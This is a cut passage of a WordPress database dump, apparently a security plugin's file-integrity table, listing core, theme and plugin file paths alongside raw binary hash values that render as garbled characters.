,'wp-content/plugins/spam-captcha/core/lang/SL_framework-pl_PL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\n3[��x���j�V','�7�*��g6��P�ԌQ���]�86�	�_}۽�','',0,'?'),('��vP�w�܄���$e','wp-content/themes/barletta/inc/widgets/widget-barletta-social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5����R�I�����','��*b�����L�?�ϲ���� z(�-�','',0,'?'),('���[	B����J[<��','wp-content/themes/nirvana/js/frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;PԐEI�5����','4��S4;����f�+�l\"����rU��˅���ס','',0,'?'),('���\\F�Z�7i�','wp-content/themes/twentynineteen/sass/site/primary/_comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5xs���T[n�','���D\r�q�}cp���Ia�� �\"C�Ļ��','',0,'?'),('���I:�.�X�<��!�','wp-content/themes/twentytwenty/assets/images/2020-square-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��4(��|���&�','�`�z�z�Y`]���3��)�]:a>�?oez��','',0,'?'),('��cmg�Ǘ�f�*�‰','wp-content/themes/square/languages/square.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�6�N��<��F','Z�ؤFܨ���J��@��luB����v','',0,'?'),('��n1.Óu�t���lX','wp-admin/css/colors/modern/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,4#9���u!��C\rV','�MφifO������d3rw󲼽�X�+�','',0,'?'),('����\n;R�����0�!�','wp-content/plugins/unyson/framework/includes/option-types/typography/static/images/google-fonts.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�i��8��+��u�','�-e�I�� M+��\'K��|c��o��','',0,'?'),('����`%��{��+��','wp-content/plugins/wordfence/images/icons/error128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�%7�!��.�','{h\0,�]�z�k�V�{җ�6nG\n�x��s9�','',0,'?'),('���v��\\Q���-��','wp-includes/js/tinymce/plugins/hr/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	%>�)���•;��','؃F��S�[k���&�f� 6+�b�>��','',0,'?'),('���[Ǡ+P$h*�A�%','wp-content/plugins/spam-captcha/core/lang/SL_framework-es_GT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z:�8,�fW+�P/\n','-��6 {3��`��ȴ#]���;�n%��x','',0,'?'),('�¸�{����Ywϙ','wp-content/themes/hueman/assets/global/oldBrowserCompat.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����TU^�c\'b!','?H\Z�̪B�K�jL���r�/!��M��g\n�','',0,'?'),('��t��h�	,Gx�\"M','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��R�N\Zb8M�g�|','{�����R�tH}��ܧYQ��{�F\Z�H�','',0,'?'),('���9�X����U�7�z','wp-content/plugins/wordfence/models/page/wfPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�bo i�%H��Xw�Xv','ƅ1h�/jw�<U���\\�k�q%s|W�6��','',0,'?'),('��і�q��SGKy(�','wp-includes/kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ի�~�:Iu�1��','��<��/=�N����i�����gU�cpU','',0,'?'),('��}B�[�^�cQ�\n;w','wp-content/plugins/wordpress-seo/inc/wpseo-functions-deprecated.php',0,'��OuA;������͗�','��OuA;������͗�','��:�y�������=���S�R �o@���|�','',0,'?'),('��/�jҔ��\Z�BR��','wp-content/themes/alpha-store/img/carousel-img.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5<\nrƀ�6\'I�wm	T�','�L�<�޵��X#�9tk�̨��b��c�5�E','',0,'?'),('�\0�i�fP�+�ܠ�I','wp-content/themes/twentyseventeen/template-parts/page/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���.vh|O[F{)�','ř��;�|�U�8p(�����~A�c��e�','',0,'?'),('��c�cXRd���','wp-content/themes/twentytwentyone/.stylelintrc-css.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y��7�1�ɮ��s','�tc�u�w���xă��;0���1�-','',0,'?'),('��DQ�ЦWfw����','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_pager.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E��,�D�T%0�','���R:c����������v,b�����Z','',0,'?'),('��\0e\Z�^<�C*w�\0[','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/libs/bootstrap3/js/bootstrap.min.js',0,'&A*���#�=���5<)','&A*���#�=���5<)','僉k�Y�(�O(��N\'=X֘�B��x5�','',0,'?'),('�\Z<�J�4���g*�','wp-content/plugins/spam-captcha/core/tree.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0D�/�X�`:AA�*�E',']{���.��F�e������K�)�7��%�㆞T�','',0,'?'),('�9��l�ן? r��q�','wp-includes/class-wp-user-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�E�Ps5\07�','i�\"�wȳ�oA)���l����g�pUɸ$','',0,'?'),('�����p�	���@�d','wp-content/themes/hueman/assets/front/fonts/titillium-semibold-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J�W8��bc:]}�','`z�a�(d��T���`��A�D��RP�-','',0,'?'),('��N;g�s��nE57,','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_responsive-utilities.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gR\\5�I�P���U\0�;','6�����BW�a4;���/��|��r4)��L1','',0,'?'),('�$�`�Ĕƽ�\ry),3','wp-content/themes/sg-window/publication/search.php',0,'w̗�����toE�P','w̗�����toE�P','`��P�������qR�\"! ��K1j�QIc��','',0,'?'),('�%��?���)�','wp-content/plugins/wordfence/views/common/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w]�Q�V�մi�','��q���r*���-T���N5�\r��Oc;m�a�','',0,'?'),('�2K+LzY��s7�Zv','wp-content/themes/vega/sample/images/featured-image-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�ƪ���`aL��v�#','Y�C�ŖdM�\0��\\�2���4\n�\'u9��;�	','',0,'?'),('�3jo6ĀsߍF�j\n��','wp-content/themes/hueman/functions/init-after-setup-theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NUH��@s���T�W','�P&���F�y�Ë:ŖP�ڒ�U�h1�T','',0,'?'),('�DS���3.įy}�;','wp-admin/images/browser-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\"��ӠA�\Z����%̝','+啧���0��p�Ɯ��JMk �q�w�Xب�','',0,'?'),('�HC�������C�w','wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-index-php-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��9H�O\'Q�rW6`Qf','ܴ�,�^{�\r��ItX�<,���nA/','',0,'?'),('�[�Hn[P�.~���FU|','wp-includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^y�}�8]؊T�','���N���y���ޮʲKJ\rŁ�Q�ƭ5�=','',0,'?'),('�c��n\r`�؁0���E#','wp-content/plugins/unyson/framework/includes/container-types/simple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g,����^Q�P�','�[�Y*Š�~N��r�k�]2�+�\'�EL�8�g','',0,'?'),('�j��\\��Ħ<y�p�','wp-includes/widgets/class-wp-widget-custom-html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';{\"Qٍ-%��e��z','��O���3h�ÕxA\\��m�O��X��^Oq*','',0,'?'),('�o���s�R��f^�','wp-content/plugins/all-in-one-wp-migration/lib/model/export/class-ai1wm-export-enumerate-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��H��W6;(wy�','��a4\r�\'���kހ~R�M��	� Y*�6��\'','',0,'?'),('�w�b��yXR�t��','wp-content/themes/clean-magazine/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���.����l�`Em','ev9}�c�\\\\v\\��\"<�و���\0�aJ�2L<�H','',0,'?'),('�z�\0��a�?�A��y','wp-content/themes/sg-window/img/icons/small/delicious.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�,��,�qXs2��','q;��?O�O�sGt>�i�\Zt}a⟑�S��H�','',0,'?'),('���7��!WU�}A<�','wp-content/themes/illdy/layout/images/front-page/front-page-team-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ji��A#�XE%�','[�Z={����3ʵBFݒU�v�۹~��]�','',0,'?'),('��T����C�B\\�','wp-content/themes/skt-construction-lite/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@d�Jo%@���','j��e�m~@59X�d��…�w�f�}Y\r�%Q&��','',0,'?'),('����Z�\Zxcy�d��\'','wp-admin/js/language-chooser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7e�]��^J�[�2X','ӛ�x��O�q�W��b ��xM1�l�	NuTi','',0,'?'),('��[�s::��q��+�','wp-content/themes/twentytwentyone/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q���M\"�BC�	�','���~Բ��+@�w�GՑ.4C�O��iC���','',0,'?'),('��U�Eu�����D�?�','wp-content/plugins/wordpress-seo/admin/views/class-yoast-form-fieldset.php',0,'5ʔ��dt���J�x','5ʔ��dt���J�x',']���ֻ�b�d\rm%���¡I�\rp+`��A','',0,'?'),('���%�I3-�7�','wp-content/themes/twentynineteen/style-editor-customizer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	9�䩠�\"�\0m���','�/} ���	��ԾA9{�!���w���a��.','',0,'?'),('���6B�b���M��','wp-content/plugins/wordpress-seo/inc/sitemaps/class-author-sitemap-provider.php',0,'G��B�u+?�ٲ��!��','G��B�u+?�ٲ��!��','�\r�|@\n&�\n���/� δPK�<F,�\\N8\0�','',0,'?'),('���%���\\(w����&','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I\0��$K��  �	','V�p\Z�1͌э�\'=~�ٲ�F_u\\��P�','',0,'?'),('��Gfir\0�)�|��S','wp-content/plugins/wordfence/css/phpinfo.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��Q���!�0w/�蓴','���a�@|��I\r=\Z^ε�d)�[�����W��','',0,'?'),('�����:x�=�}�','wp-includes/js/jquery/ui/mouse.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�;��ty����','�G������[&�~ͤ�E3�	�z͟��ӱ�','',0,'?'),('����b#$Uc{ί�','wp-content/themes/alpha-store/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�D_}��ұOl�','�]�k%�Q��)��2@(<�;�!�3	0\\','',0,'?'),('��i~���Fdc;hq','wp-content/themes/fabulous-fluid/js/jquery.cycle/jquery.cycle2.scrollVert.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\"�U2M|����f��b','T�HG��pyI���L�v����Oa��2h','',0,'?'),('��H�a�+����̰I�','wp-content/plugins/wordfence/waf/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�%�S�\\!+���d�~','���8���|~�‘1뢇�:�HB�g撚r','',0,'?'),('��8)c�EV�V����','wp-content/themes/nirvana/sidebar-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#6BRR��;/>5{','�M�-)�J��-1|uxLw����;����t�n','',0,'?'),('���g�k�\'�%t(','wp-content/themes/fluida/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���v�I}7�ZxB=�Q','<�#�W���jY�\"N�`�d[��U��8yE�','',0,'?'),('��;�;/J�KmR��0�','wp-content/plugins/akismet/views/start.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�z�\"\'�\0�\0Y7^kTj','�=P���=�y�p��y�P���*u]����*','',0,'?'),('��s�n2��}���<','wp-content/plugins/unyson/framework/includes/option-types/datetime-picker/static/css/jquery.datetimepicker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�Z����	|��c�Q`','�,�F��C�F�#�~j���R�q�s�:R���','',0,'?'),('���ѫɉ�2̦��[B','wp-content/themes/supernews/acmethemes/core/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d��w�9�ͻ;�','h�e�� .7��V[�æ�?�,_RyS����N','',0,'?'),('��y�&a�A�7�]Dm','wp-content/plugins/wordfence/images/icons/ajaxRed16.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%���B\ng�2��;','D,�A�J���lOS�p�e؇�&���','',0,'?'),('�\r�+�v��o�:�J�','wp-content/themes/nirvana/images/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�C=����濊��g','�Lj����q���Z�=	|�s�oi�����x�','',0,'?'),('�ƞׅ\ZX�X]�Y�F','wp-includes/js/codemirror/htmlhint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�|џ�G�MtP5��','\0U[\0�M\'mCռ5��5k`����5�ё','',0,'?'),('�PB�\n��Z�Y �P�','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�21����b���m� ','H���>���@+��q�j(~�]�v`�즃�\'','',0,'?'),('���\rg�h/N����','wp-content/plugins/dw-social-share/assets/img/style-5.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X8�7���;8t�?�','3HA8�	w��D}�^���xʞώɹ,-	{\\I\0W','',0,'?'),('� a\"KwT�bc1S','wp-admin/css/revisions.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+\r�8��oK�hxA�<','�G���gޤ �}����?���3����䓲�C2','',0,'?'),('�#��H|<JMWx��d:','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/config.php',0,'&:3ڃ\r�E���a��','&:3ڃ\r�E���a��','Mkn@+zCfZ���%��6����aI� ?Մ��~','',0,'?'),('�-�[ip��\\^���]','wp-includes/widgets/class-wp-widget-tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x̭&�b�+|eS�݂','�,��ɼ?��?�	p�f\0qO��_���&N9','',0,'?'),('�/�H�Q$�\Z�Q��','wp-content/themes/aqueduct/img/thumbnail.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�o��_#��-��eX','�C��؉���*��G|\rO�҅�	r�Gg���,','',0,'?'),('�0�&�Y�������','wp-content/plugins/wordfence/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('�4g��e���>���ߝ','wp-admin/images/list-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hջIS�2��i�g�','��J�p�S_��X��#���UB�-z���,�','',0,'?'),('�8_!Sຓ��Y2� q','wp-content/themes/relia/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*ٕ�K��h��4�','W7��}�|9����ʾZ#r:�5���\0�=!��','',0,'?'),('�;�f�J1��˘��+C','wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�<���^��=�f','s]ѽj$��	��↜������Sk��ik�','',0,'?'),('�OOwT�M\r��Y�!d','wp-includes/js/mediaelement/mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-6�������m����','���%�]�cط�Z���7�\n�ԋ���2���','',0,'?'),('�P<-\'��O�4t�y}��','wp-content/themes/panoramic/library/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZU~^�Z_\nm�~���',')P%qn�~u��ߒƼ�&	���)I\0���� ','',0,'?'),('�Z�P��+��EƦ��','wp-content/themes/verbosa/resources/styles/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�h#�<�+����Vd','�}+:�h~A��Ƞ�-O����3��̬(��@e:','',0,'?'),('�]X�6n���)�','wp-content/themes/relia/inc/css/temps/green.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O*�&��{/?��g�N','�5*C�q�5W�!��D�n����p	��i','',0,'?'),('�]ǿ|������IC�','wp-includes/js/dist/keycodes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AUܱ�c?�<]&]��','R��p�ݴ`����&Ϛ�vcg%����fs�','',0,'?'),('�eh�z/_�i\0ͮ','wp-content/themes/hueman/assets/czr/css/img/green@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�G]>�{�� ��K','���Q�4-t��y�Sy��2�����h-','',0,'?'),('�fkj��N�Uei4=%�','wp-admin/js/tags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}5��nʢ�B�X�','�<��(@�x|�U�.����0����G��','',0,'?'),('�hͳkq}��gK6�','wp-content/themes/the-minimal/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fp�y��l9��K','L ����uͶ�΁�\"�K:��4+�\rt.�','',0,'?'),('�h��R��v�h���U[W','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/auth/Google_P12Signer.php',0,'/fX����Q���','/fX����Q���','ƉV���ȁ�mWkh�se-��BG?i�','',0,'?'),('�l8ԆYd2Q��¼ݼ','wp-content/plugins/spam-captcha/lang/spam_captcha-de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�O���{xz��','\rV|ws��}J�n3�3�i��U�K�;(�]&','',0,'?'),('�y%���Ǻ~�ne\"V','wp-admin/css/list-tables-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݶZߥ�4�b�m�','�i@��^���[�q�����`�A]@q�','',0,'?'),('�|�mN~�lEJߣ7��','wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iJ�%/t1��\'9[~Z','� nK��J\'k�Z��&���-!T9����','',0,'?'),('��;o.�0c	ϪV����','wp-content/themes/square/css/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�$����!��z��','ό�;R�����s�x�}��|4>��ƙ`2����','',0,'?'),('����o	�� p','wp-content/themes/travelify/languages/pt_PT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����d2�Z�z�g','c2�����\'���s�U�\\�38���SP��','',0,'?'),('���f�bH!�r��','wp-content/themes/nirvana/images/socials/SoundCloud.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Si�ݕ���4@־��','��\"�A�Q7�J>\rMwn��{���%	�\n�','',0,'?'),('��,I<\'�\"�^��j}�','wp-content/plugins/wordpress-seo/js/dist/wp-seo-featured-image-350.min.js',0,'T�b����W�OY�7','T�b����W�OY�7','��_fM4�s�����p�g�\Zg�t��V��U','',0,'?'),('��m8�l>Q��(k�','wp-content/plugins/unyson/framework/extensions/backups/views/page.php',0,'��a(�I���AS�','��a(�I���AS�','	��[6���_Z|�rї���X��\n�','',0,'?'),('�����B��cV��t��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/button/config.php',0,'�Y�A�o�N�\0�L�_','�Y�A�o�N�\0�L�_','u埋��p��@��-�3��z\n�v�`<u��\'','',0,'?'),('���/�-�Tǻ�T<�S','wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�L��$�~ZvV��','�\"��꯹�bG�����|���E���L�ٟ,','',0,'?'),('���[$积<9Am��','wp-content/themes/verbosa/content/content-index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�I�	e�Gܖ%��','ю$�e�Ɠ��ڢ=px�-�T�m�\'��}�	4','',0,'?'),('�ǓFIs��jkW�X{','wp-content/themes/clean-magazine/images/gallery/featured2-480x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�����Bh��','v�܉x���2�/�l�dV��\'��C2`','',0,'?'),('�̎�뙎��f��9','wp-content/themes/sg-window/sidebar-2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0QHL���.0L����s','JX��/�9�����y�+#��bp��?�','',0,'?'),('��#���E��e�ۚ��','wp-content/themes/relia/woocommerce/archive-product.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Mٛ��Py�t\Z�H�','�����H��8��]mᯓ��7?�Oq,��$ݛ','',0,'?'),('��|�zh�}/�^���','wp-content/themes/travelify/library/panel/images/right-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�B�D�n�$\'V�-�','@���ٌ�1b��>���MQ}~�_����','',0,'?'),('�׫�����^y�_\r�','wp-content/themes/sg-window/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��NiJf��\"Ԛ',':Ӎ���L�0VH�5�\'�~\0��5	GO�����','',0,'?'),('�璞Q��rЩ�@����','wp-content/themes/skt-construction-lite/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�����\Zr��P��','Y�yjF��D�\Z�r�7���vDL�r�ӻ�[qq','',0,'?'),('��\Z�KD���o�b�C�','wp-content/themes/clean-magazine/languages/da_DK.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0%�U[�K��	��','���\0���P�<��s��u�)C�4ڋcN�r','',0,'?'),('�i�;�Γi�s�z�u{','wp-content/themes/travelify/library/structure/sidebar-extensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k��qr�h;\\�~P','2��Yy�5ۚ��|%)�[6��}籈��;.��','',0,'?'),('�ҥ�l��R��VBP�U','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.mx.php',0,'�ۆ`9��6u]�4H�','�ۆ`9��6u]�4H�','�\\t��BE肈�G랖`_�/��E��뜞[-4','',0,'?'),('����]���rQ��','wp-content/plugins/spam-captcha/lang/spam_captcha-fa_IR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ή�%<�e2��3M�','C]�h\0�h8c�R(e�S��B�ip�0�\n7��-','',0,'?'),('�1�o%��q�A��','wp-admin/js/inline-edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K#��D~�z��u��','𴯟-�\nL��.��$���i��p�}a��<!','',0,'?'),('�<ku5ߌ�=¹�p','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/updater.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�:<�5��/����','�����̟UC��n�îPf}2D��\Z�g��','',0,'?'),('�S��_��+;���xz�','wp-content/themes/illdy/layout/images/front-page/front-page-header.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X3N�����o�L1M','�\0V_��T�5Y���Y���b���;��H�t��','',0,'?'),('�TL �߈,]��զ�m�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�	�����:{��W��e','6{w���^Gk�Ϋ�25�b��\r��񓫄�','',0,'?'),('�W�t��ùꗼXb�','wp-content/themes/relia/inc/css/temps/teal.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d���;�Q�QN','��*�fH�Ԗѧ�D��@&�yԌ���v\"�','',0,'?'),('�Z�khƾ|�%�jВA','wp-content/themes/sg-window/inc/css/list.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v8�@�=�b\rr��:��','VA�\0����W�����ܲ��`���jd}(','',0,'?'),('�m�H�:�M���*��^','wp-includes/css/dist/editor/editor-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Wu��G1V��','� d��`�+4�Y�;Y�ƏZ�Zt��#}','',0,'?'),('�o�x�>�a�����0o','wp-content/plugins/unyson/framework/extensions/backups/manifest.php',0,'+\"��̨���)���A','+\"��̨���)���A','h�\0�k�&�{���r���N�k��r�c�3\"','',0,'?'),('�s��Ei��[D\"��*','wp-content/themes/point/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�%ǃ\n��pG��','u��ǣ�A�\\��=���K�S5�c6R� Ja','',0,'?'),('�z�h9��ꈦ��Xp�+','wp-content/plugins/wordfence/views/scanner/no-issues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xt-|�F������e�','��_?7���c���:_��@���E�J��s��[','',0,'?'),('���1XM)9���V�:','wp-content/themes/hueman/parts/post-list-author-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�D�[�	6�w�','!�.g�!�T4��xb+�QPw/b,��E','',0,'?'),('����}�/��VQ�r�','wp-content/themes/wen-business/assets/js/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�lu<c~es�Ww[q9','�4?�D�^n��sU*�;j��;yfV������','',0,'?'),('����v���V5ǃ�D�u','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ�\n�1�h;!�','�Mϡ�	����p�k��)����!\r��','',0,'?'),('��~o`@�b���\\�','wp-content/themes/fluida/resources/fonts/elusive.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̟�\Zc�S���(��','���7Z���WG�|ʃ�x%mֵ}�Q��\\`\Z���b','',0,'?'),('����|���xY�iF','wp-content/themes/twentytwentyone/assets/sass/06-components/footer-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ߔ>�j7\'\r\0��','���K\ns�DШ�D}�\0b�x:�XJ�HlN~��k','',0,'?'),('��E�S�c+��#�)','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�Nm�S���C��{�','���P~�{p��}x{�8�2�hX�x���','',0,'?'),('���\\iP���GN$�','wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��͈�����w�wK','���:($K��Ѽ�y�Ϗ�7b���f㓶��','',0,'?'),('��[��܀�xM�G�L��','wp-content/plugins/wordpress-seo/vendor/autoload_52.php',0,'ĜDf���΁Y@�8','ĜDf���΁Y@�8','M23�տ�����mۮ��+��c�����','',0,'?'),('���9o�I�l9�`�S','wp-content/themes/nirvana/admin/images/schemes/More or Less.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�;�\0�����fc1�R�','^�_!��\n��i�{׷�D+hFb�Z~,�����1','',0,'?'),('�����Pf6������','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.lt.php',0,'��S@-�(C�<�e�i�&','��S@-�(C�<�e�i�&','R�i����:\re��1a�尝��+������','',0,'?'),('���:j�(�I<�?�Y�','wp-content/themes/fabulous-fluid/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tB\"��G\0Ƽ��*e<','6x�SZ?\\���������$�j�Y%��b��','',0,'?'),('��F�����{��A','wp-content/plugins/wordfence/lib/sysinfo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{X�6��92����','G,��=����C\Z3���~f�(8��Ψ��@�,ї','',0,'?'),('��E���Q?��	(�','wp-includes/class-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j,;�\Z3�x���','��0�v�!�vv7�H�lV�d���i\'K�����','',0,'?'),('�.݁B��xK�Y�','wp-includes/ms-default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�����n����','W�a�h\n�\0�8u�v���yv,N�����!�wh','',0,'?'),('�W����y)�{#i�','wp-content/plugins/unyson/framework/includes/option-types/class-fw-option-type-undefined.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӱ�_��[-Ě�bV0�','=7�\r�����p��4a�Fl5��ۚ<\rۋs�','',0,'?'),('��EnZbʹ]w�	